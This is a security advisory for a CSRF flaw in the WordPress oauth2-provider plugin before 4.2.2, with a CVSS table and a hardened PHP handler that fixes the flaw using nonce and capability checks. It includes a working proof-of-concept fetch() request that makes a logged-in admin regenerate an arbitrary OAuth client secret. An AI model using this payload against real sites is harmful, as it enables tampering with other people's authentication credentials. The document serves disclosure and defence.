6.5 Medium
| CVSS3 metric | Value |
|---|---|
| Attack Vector | NETWORK |
| Attack Complexity | LOW |
| Privileges Required | NONE |
| User Interaction | REQUIRED |
| Scope | UNCHANGED |
| Confidentiality Impact | NONE |
| Integrity Impact | HIGH |
| Availability Impact | NONE |
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N |
The plugin does not have a CSRF check when regenerating secrets, which could allow attackers to make logged-in admins regenerate the secret of an arbitrary client, given they know the client ID.
Make a logged-in admin open a page containing the HTML code below. This will regenerate the secret for the client with ID KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7.

```js
fetch("https://example.com/wp-admin/admin-ajax.php", {
  method: "POST",
  headers: new Headers({
    "Content-Type": "application/x-www-form-urlencoded",
  }),
  body: "action=wo_regenerate_secret&data=KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7",
  redirect: "follow"
}).then(response => response.text())
  .then(result => console.log(result))
  .catch(error => console.log("error", error));
```
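As an added defender-side example (not the plugin's own code), this is what a hardened handler for the admin-ajax action named above looks like using WordPress's standard nonce and capability APIs; the nonce action name, the storage helper and the script handle are assumptions for illustration.

```php
<?php
// Illustrative hardened handler for the wo_regenerate_secret admin-ajax action.
// Example code, not the plugin's own; example_store_client_secret() is a
// hypothetical stand-in for the plugin's real client store.

function example_store_client_secret( $client_id, $secret ) {
    // Hypothetical storage; the real plugin keeps client records elsewhere.
    update_option( 'example_client_secret_' . $client_id, $secret );
}

function example_wo_regenerate_secret() {
    // 1. Nonce check. A page on another origin cannot read the nonce that is
    //    bound to the admin's session, so a cross-site fetch() like the one
    //    above fails here. Third argument false returns JSON instead of dying.
    if ( ! check_ajax_referer( 'wo_regenerate_secret', '_wpnonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce' ), 403 );
    }

    // 2. Capability check. Being logged in is not authorization; require a
    //    capability that only site administrators hold.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }

    // 3. Validate the client ID instead of passing raw POST data through.
    //    The length range is an assumption based on the 40-character ID above.
    $client_id = isset( $_POST['data'] ) ? sanitize_text_field( wp_unslash( $_POST['data'] ) ) : '';
    if ( ! preg_match( '/^[A-Za-z0-9]{20,64}$/', $client_id ) ) {
        wp_send_json_error( array( 'message' => 'Invalid client ID' ), 400 );
    }

    // 4. Generate a new high-entropy secret and store it; never echo it back
    //    in a place where it could be logged or cached unintentionally.
    $secret = wp_generate_password( 40, false );
    example_store_client_secret( $client_id, $secret );

    wp_send_json_success( array( 'client_id' => $client_id ) );
}
// Registered for logged-in users only; no wp_ajax_nopriv_ variant is needed.
add_action( 'wp_ajax_wo_regenerate_secret', 'example_wo_regenerate_secret' );

// The legitimate admin page has to send the nonce with its request, so expose
// it to the page's own script (handle and file name are assumptions).
function example_enqueue_admin_script() {
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'wo_regenerate_secret' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_admin_script' );
```

The page's script then posts `_wpnonce=<exampleAjax.nonce>` together with `action` and `data`; any request that lacks it, including one forged from another site, is rejected before the secret is touched.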
| CPE | Name | Operator | Version |
|---|---|---|---|
| | oauth2-provider | lt | 4.2.2 |